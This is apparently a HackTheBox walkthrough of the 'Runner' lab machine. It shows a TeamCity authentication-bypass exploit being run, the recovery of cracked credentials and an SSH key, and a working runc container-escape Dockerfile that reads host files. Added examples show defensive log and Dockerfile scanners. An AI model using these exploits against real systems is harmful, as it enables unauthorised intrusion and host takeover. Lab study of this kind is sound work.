Runner HTB Walkthrough by Reju Kole

Reju Kole
7 min read · Aug 3, 2024


Runner

Welcome! It is time to look at the Runner machine on HackTheBox. I am making these walkthroughs to keep myself motivated to learn cyber security and ensure that I remember the knowledge gained by playing HTB machines.

Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Level — Medium

Machine URL : Hack The Box :: Hack The Box

About Runner — Runner is a medium difficulty Linux box that contains a vulnerability ([CVE-2023–42793](https://nvd.nist.gov/vuln/detail/CVE-2023-42793)) in `TeamCity`. This vulnerability allows users to bypass authentication and extract an API token, which can be used to enable debug features for executing system commands. By gaining access to a `TeamCity` docker container and compressing the `HSQLDB` database files, we can extract credentials for the user `matthew` and find an `SSH` key for `john`. After cracking the password, we can authenticate on the host filesystem. Upon inspecting the `/etc/hosts` file, we discover a running `Portainer` instance. Using `matthew's` credentials, we access the subdomain externally. While authenticated, we find that we can create images, but our privileges are limited. After checking the version of `runc` on the host, we exploit a vulnerability ([CVE-2024–21626](https://nvd.nist.gov/vuln/detail/CVE-2024-21626)) through the image build function of `Portainer`, which allows us to create a SUID bash file on the host.

Enumeration

To kick off this box, let’s run a Nmap scan to see what services and ports are open.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -A -Pn 10.10.11.13
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-29 15:54 EDT
Nmap scan report for runner.htb (10.10.11.13)
Host is up (0.21s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Runner - CI/CD Specialists
8000/tcp open nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=7/29%OT=22%CT=1%CU=43760%PV=Y%DS=2%DC=T%G=Y%TM=66A7
OS:F3A0%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)
OS:SEQ(SP=100%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)SEQ(SP=100%GCD=1%ISR=10B%TI=Z%CI
OS:=Z%II=I%TS=A)SEQ(SP=101%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST1
OS:1NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53
OS:CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T
OS:=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T
OS:2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=4
OS:0%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=16
OS:4%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 163.43 ms 10.10.14.1
2 163.61 ms runner.htb (10.10.11.13)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.79 seconds

The scan shows three open TCP ports: 22 (OpenSSH 8.9p1 on Ubuntu), 80 (nginx 1.18.0, page title "Runner - CI/CD Specialists") and 8000. Nmap's nagios-nsca label on 8000 comes from its default port table, not from a banner; the http-title script output shows the port actually speaks HTTP and returns a text/plain body, so treat it as a second web service rather than Nagios.

Let’s add Runner host to our /etc/hosts file.

echo "10.10.11.13 runner.htb" | sudo tee -a /etc/hosts

Web Enumeration

Browsing to the IP in Firefox shows the Runner landing page ("Runner - CI/CD Specialists"), which refers to the domain runner.htb. Since the site is served under a hostname, the next step is virtual-host fuzzing: keep the URL fixed and vary the Host header. The -fs 154 filter drops the 154-byte response nginx returns for hostnames it does not know, so only vhosts that answer differently show up.

┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://runner.htb/ -H "Host: FUZZ.runner.htb" -fs 154

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://runner.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.runner.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 154
________________________________________________

teamcity [Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 172ms]
:: Progress: [100000/100000] :: Job [1/1] :: 144 req/sec :: Duration: [0:09:01] :: Errors: 0 ::

FFUF — ‘teamcity’ subdomain found

Add the discovered vhost to /etc/hosts as well (the 401 tells us it exists and expects authentication):

echo "10.10.11.13 teamcity.runner.htb" | sudo tee -a /etc/hosts

Web Exploitation

Open the HTTP link in a new tab.

http://teamcity.runner.htb/login.html

The login page reveals TeamCity version 2023.05.3 (build 129390), which is affected by CVE-2023-42793.

TeamCity Admin Account Creation CVE-2023-42793

Exploitation

CVE-2023-42793 is an authentication bypass: an unauthenticated request can obtain an API token for the administrator, and with that token an attacker can either enable the debug features that execute system commands (as in the box description) or, as the exploit below does, simply create a brand-new administrator account. The exploit I used:

H454NSec/CVE-2023–42793: JetBrains TeamCity Authentication Bypass CVE-2023–42793 Exploit (github.com)

Run it against the vhost:

┌──(kali㉿kali)-[~/CVE-2023-42793]
└─$ python CVE-2023-42793.py -u teamcity.runner.htb
[+] http://teamcity.runner.htb/login.html [H454NSec4372:@H454NSec]

The exploit created a new administrator account and printed its credentials (username H454NSec4372, password @H454NSec).
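As an added example (not code from the original write-up or from the exploit's author), here is the defender's side of this step: a small Python scanner that runs over nginx access-log lines for the teamcity vhost and flags the stages of the CVE-2023-42793 chain as documented in public advisories: REST calls reached through the `/RPC2` suffix that bypasses authentication, the `internal.properties` edit that enables `rest.debug.processes`, calls to the debug process-execution endpoint, and a user created over the REST API. The log lines are constructed for the example, not captured from the box.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Added example, not part of the original write-up. Constructed nginx
# combined-format access-log lines for the teamcity vhost (not real traffic
# from the box): 10.10.14.5 walks the CVE-2023-42793 chain, 10.10.14.9 is a
# bystander who simply gets a 401.
SAMPLE_LOG = """\
10.10.14.5 - - [29/Jul/2024:15:58:01 -0400] "GET /login.html HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
10.10.14.5 - - [29/Jul/2024:15:58:03 -0400] "DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 204 0 "-" "python-requests/2.31.0"
10.10.14.5 - - [29/Jul/2024:15:58:03 -0400] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 318 "-" "python-requests/2.31.0"
10.10.14.5 - - [29/Jul/2024:15:58:04 -0400] "POST /app/rest/users HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
10.10.14.5 - - [29/Jul/2024:15:58:05 -0400] "POST /admin/dataDir.html?action=edit&fileName=config/internal.properties&content=rest.debug.processes.enable=true HTTP/1.1" 200 0 "-" "python-requests/2.31.0"
10.10.14.5 - - [29/Jul/2024:15:58:06 -0400] "POST /app/rest/debug/processes?exePath=id HTTP/1.1" 200 77 "-" "python-requests/2.31.0"
10.10.14.9 - - [29/Jul/2024:16:01:10 -0400] "GET /app/rest/server HTTP/1.1" 401 66 "-" "curl/8.5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def classify(method, target):
    """Name the CVE-2023-42793 stage a request belongs to, or None if benign."""
    parts = urlsplit(target)
    path = parts.path
    query = parse_qs(parts.query)
    # Stage 1: TeamCity exempted paths ending in /RPC2 from authentication, so a
    # REST call reached through that suffix (DELETE then POST on the admin's
    # token resource in the public exploits) is the bypass itself.
    if path.startswith("/app/rest/") and path.endswith("/RPC2"):
        return "auth-bypass: REST request via /RPC2 suffix"
    # Stage 2a: the stolen token turns on the debug endpoint via internal.properties.
    if path == "/admin/dataDir.html" and "rest.debug.processes.enable" in query.get("content", [""])[0]:
        return "debug-enable: internal.properties edited to enable rest.debug.processes"
    # Stage 2b: the debug endpoint executes an arbitrary binary on the server.
    if path.startswith("/app/rest/debug/processes"):
        exe = query.get("exePath", ["?"])[0]
        return f"rce: debug process execution (exePath={exe})"
    # Stage 2c: a user created through the REST API right after the bypass is
    # the exploit's new administrator account.
    if method == "POST" and path == "/app/rest/users":
        return "persistence: account created via REST API"
    return None


def scan(log_text):
    """Run classify() over every parseable log line and collect the hits."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rule = classify(m["method"], m["target"])
        if rule:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "method": m["method"],
                "path": urlsplit(m["target"]).path, "status": int(m["status"]),
                "rule": rule,
            })
    return findings


def by_source(findings):
    """Distinct stages seen per client IP; several stages from one IP is a full chain."""
    stages = {}
    for f in findings:
        stages.setdefault(f["ip"], set()).add(f["rule"].split(":")[0])
    return stages


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]} {h["method"]} {h["path"]} {h["status"]} -> {h["rule"]}')
    print(by_source(hits))
```

The `/RPC2` rule is deliberately broad: any REST path reached through that suffix is suspicious regardless of which resource it targets, because legitimate clients never use it. Grouping by source IP is what separates a scanner poking at one endpoint from a host that completed the whole chain.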

After logging in with those credentials we land on the TeamCity overview page.

The Administration > Users page lists two other accounts, john and matthew.

The Administration area also exposes the Backup function, and our new account is allowed to create and download a backup.

Since we already know two usernames, the backup is the obvious place to look for their credentials. Its contents include an SSH private key under /config/projects/AllProjects/pluginData/ssh_keys and password hashes for matthew and john in backup/database_dump/users.

After extracting the backup zip, the key reads:

┌──(kali㉿kali)-[~/…/projects/AllProjects/pluginData/ssh_keys]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----

Privilege Escalation

Save the key to a file (here named Runner), restrict its permissions with chmod 600 Runner, and log in as john:

ssh -i Runner john@10.10.11.13

User.txt — 9ca8172f168764e24fa49380b24b6a1c

So, we get the user.txt

Enumerating the host as john, /etc/hosts lists an additional vhost, portainer-administration.runner.htb, which points at a Portainer instance.

Add it to our /etc/hosts file as well:

echo "10.10.11.13 portainer-administration.runner.htb" | sudo tee -a /etc/hosts

Open the HTTP link in a new tab.

http://portainer-administration.runner.htb/#!/auth

It presents a login panel. We do not have a password yet, but we do have matthew's hash from backup/database_dump/users, and John the Ripper cracks it:

 $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em

User: matthew

Pass: piper123

The $2a$07$ prefix marks this as bcrypt with cost factor 7 (only 128 rounds), which is why a wordlist attack finishes quickly. These credentials also log us in to Portainer.
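Before reaching for John, it helps to know exactly what you are cracking. This added example (mine, not from the write-up) parses the modular-crypt string above: the `$2a$` prefix identifies bcrypt, `07` is the cost, followed by a 22-character salt and a 31-character digest. It also maps the common crypt prefixes to John/hashcat format names and quantifies why cost 7 is weak. `MATTHEW_HASH` is the hash from the backup; the sha512crypt string used in the test is constructed.

```python
import re

# Added example, not from the original write-up. Modular-crypt-format prefixes
# and the John the Ripper format name / hashcat mode they correspond to.
MCF_FAMILIES = {
    "1": ("md5crypt", 500),
    "5": ("sha256crypt", 7400),
    "6": ("sha512crypt", 1800),
    "2a": ("bcrypt", 3200),
    "2b": ("bcrypt", 3200),
    "2x": ("bcrypt", 3200),
    "2y": ("bcrypt", 3200),
}

# bcrypt: $2?$ + two-digit cost + 22 salt chars + 31 digest chars (60 total).
BCRYPT_RE = re.compile(
    r"^\$(?P<ident>2[abxy])\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)

# matthew's hash from the TeamCity backup (on the page).
MATTHEW_HASH = "$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em"


def identify_mcf(hash_str):
    """Map a $id$... string to (john_format, hashcat_mode); raise on unknown prefixes."""
    m = re.match(r"^\$([^$]+)\$", hash_str)
    if not m or m.group(1) not in MCF_FAMILIES:
        raise ValueError(f"unrecognised modular-crypt prefix in {hash_str[:8]!r}")
    return MCF_FAMILIES[m.group(1)]


def parse_bcrypt(hash_str):
    """Split a bcrypt string into its fields and validate the cost range."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a well-formed bcrypt string (need $2x$NN$ + 22 salt + 31 digest chars)")
    cost = int(m["cost"])
    if not 4 <= cost <= 31:
        raise ValueError(f"bcrypt cost {cost} outside the valid 4..31 range")
    return {
        "ident": m["ident"],
        "cost": cost,
        "rounds": 2 ** cost,      # bcrypt runs 2^cost expensive key-setup rounds
        "salt": m["salt"],
        "digest": m["digest"],
    }


def cracking_speedup(cost, baseline_cost=12):
    """How many times cheaper each guess is than at a sane baseline cost.

    bcrypt work doubles per cost increment, so cost 7 vs. 12 is a 32x gift to the attacker.
    """
    return 2 ** (baseline_cost - cost)


if __name__ == "__main__":
    print(identify_mcf(MATTHEW_HASH))
    info = parse_bcrypt(MATTHEW_HASH)
    print(f'bcrypt {info["ident"]} cost={info["cost"]} rounds={info["rounds"]} salt={info["salt"]}')
    print(f"{cracking_speedup(info['cost'])}x faster to crack than cost 12")
```

The practical use is twofold: `identify_mcf` picks the right `--format` for John (or `-m` for hashcat) without guessing, and `parse_bcrypt` makes the low cost visible before you spend GPU time, or, on the defensive side, lets you audit an exported user table for hashes stored below your policy's minimum cost.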

After login we will see this webpage.

Our Portainer privileges are limited, but building images is allowed. Go to the image build page:

http://portainer-administration.runner.htb/#!/1/docker/images/build

Choose the Web editor method and paste this Dockerfile:

FROM ubuntu
WORKDIR /proc/self/fd/8
RUN cat ../../../../root/root.txt

This is a Dockerfile, and the odd WORKDIR is the entire exploit for CVE-2024-21626 (the runc "Leaky Vessels" bug). Line by line:

1. FROM ubuntu:
- Use the official Ubuntu image as the base for the new image.
2. WORKDIR /proc/self/fd/8:
- Sets the working directory for the build steps that follow to whatever file descriptor 8 points at.
- /proc/self/fd/ lists the open file descriptors of the current process, and vulnerable runc (before 1.1.12) leaves a descriptor to the host's cgroup directory under /sys/fs/cgroup open while it sets up the container.
- Because the chdir happens while that descriptor is still open, the process's working directory becomes a directory on the host filesystem, outside the container's root. The descriptor number varies between runc builds, so 7 or 9 may be needed instead of 8.
3. RUN cat ../../../../root/root.txt:
- cat runs with its working directory on the host, so each ../ climbs the host directory tree from the cgroup directory towards /. Once at /, extra ../ components are harmless, which is why four are used without knowing the exact depth.
- The path therefore resolves to the host's /root/root.txt, not to anything under /proc inside the container.

In summary, this Dockerfile:

- Uses an Ubuntu base image
- Moves the working directory onto the host filesystem through a leaked file descriptor
- Reads a host file from there, which ends up in the build output

Note: the same primitive gives write access to the host, which is how the box description's SUID bash gets planted; reading the flag is enough for our purposes. The fix is runc 1.1.12, which closes the leaked descriptor before the container process starts and verifies that the working directory lies inside the container's root.

Then build the image; the cat output appears in the build log, and with it root.txt.
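Two checks a practitioner would run around this step, as an added example that is not part of the original write-up: a version test on `runc --version` output against the 1.1.12 fix for CVE-2024-21626 (with the caveat that distro packages backport fixes), a scanner for Dockerfiles submitted to an image-build service such as Portainer that flags `WORKDIR` (or variables that could feed it) pointing at `/proc/*/fd/N`, and a path-resolution helper that shows where `../../../../root/root.txt` lands when the working directory is the leaked host cgroup directory. The `runc` outputs and the benign Dockerfile are constructed; the exploit Dockerfile is the one above.

```python
import re
import posixpath

# Added example, not from the original write-up. Constructed `runc --version`
# outputs (not captured from the box); the commit lines are placeholders.
RUNC_OLD = "runc version 1.1.7\ncommit: constructed\nspec: 1.0.2-dev\ngo: go1.20.3\nlibseccomp: 2.5.4\n"
RUNC_FIXED = "runc version 1.1.12\ncommit: constructed\nspec: 1.0.2-dev\n"

# Upstream release that closed the leaked descriptor and added the cwd check.
FIXED_RUNC = (1, 1, 12)

# The Dockerfile used above, and a constructed harmless one for contrast.
EXPLOIT_DOCKERFILE = "FROM ubuntu\nWORKDIR /proc/self/fd/8\nRUN cat ../../../../root/root.txt\n"
BENIGN_DOCKERFILE = "FROM ubuntu\nWORKDIR /app\nRUN apt-get update && \\\n    apt-get install -y curl\n"

# Any reference to a process's fd table: /proc/self/fd/8, /proc/1234/fd/7, ...
FD_PATH = re.compile(r"/proc/(?:self|thread-self|\d+)/fd/\d+")


def parse_runc_version(output):
    """Extract (major, minor, patch) from `runc --version` output."""
    m = re.search(r"runc version (\d+)\.(\d+)\.(\d+)", output)
    if not m:
        raise ValueError("no 'runc version X.Y.Z' line in output")
    return tuple(int(x) for x in m.groups())


def runc_vulnerable_to_cve_2024_21626(output):
    """Heuristic: upstream version below 1.1.12.

    Distributions backport security fixes, so a package reporting an older
    version may already be patched; confirm against the package changelog.
    """
    return parse_runc_version(output) < FIXED_RUNC


def _logical_lines(dockerfile):
    """Yield (first_lineno, text) with backslash line continuations joined."""
    buf, start = [], None
    for n, raw in enumerate(dockerfile.splitlines(), 1):
        line = raw.rstrip()
        if start is None:
            start = n
        if line.endswith("\\"):
            buf.append(line[:-1])
            continue
        buf.append(line)
        yield start, " ".join(buf).strip()
        buf, start = [], None
    if buf:  # dangling continuation at end of file
        yield start, " ".join(buf).strip()


def dockerfile_findings(dockerfile):
    """Flag instructions that could point the build's working directory at a process fd."""
    findings = []
    for lineno, text in _logical_lines(dockerfile):
        if not text or text.startswith("#"):
            continue
        instr, _, args = text.partition(" ")
        instr = instr.upper()
        if instr == "WORKDIR" and FD_PATH.search(args):
            findings.append((lineno, "WORKDIR into /proc/*/fd: CVE-2024-21626 host-cwd primitive"))
        elif instr in ("RUN", "ENV", "ARG") and FD_PATH.search(args):
            # ENV/ARG can smuggle the path into a later `WORKDIR $VAR`.
            findings.append((lineno, f"{instr} references a /proc/*/fd path: review for fd-based escape"))
    return findings


def host_path(leaked_cwd, relative):
    """Where a relative path lands when the cwd is the leaked host directory."""
    return posixpath.normpath(posixpath.join(leaked_cwd, relative))


if __name__ == "__main__":
    for name, out in (("old", RUNC_OLD), ("fixed", RUNC_FIXED)):
        print(name, parse_runc_version(out), "vulnerable" if runc_vulnerable_to_cve_2024_21626(out) else "ok")
    print(dockerfile_findings(EXPLOIT_DOCKERFILE))
    print(host_path("/sys/fs/cgroup", "../../../../root/root.txt"))
```

The Dockerfile scanner is a pre-build gate, not a substitute for patching: it catches the obvious `WORKDIR` form and the variable-indirection trick, but a runtime `docker run -w /proc/self/fd/N` never touches a Dockerfile, so the version check (and the upgrade it motivates) is the control that actually closes the hole.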

Hehe!!! Finally, we got the root flag.

Root.txt — f8a769de3e84f5b8e0a2b8047ebb0e06

I hope you enjoyed this writeup! Happy Hacking :)

Follow me on below Social Media:

1. LinkedIn: Reju Kole

2. Instagram: reju.kole.9

3. Respect me On HackTheBox! : W40X

4. Check My TryHackMe Profile : TryHackMe | W40X

5. Twitter | X : @Mr_W40X

6. GitHub : W40X | Reju Kole | Security Researcher

In case you need any help, feel free to message me on my social media handles.
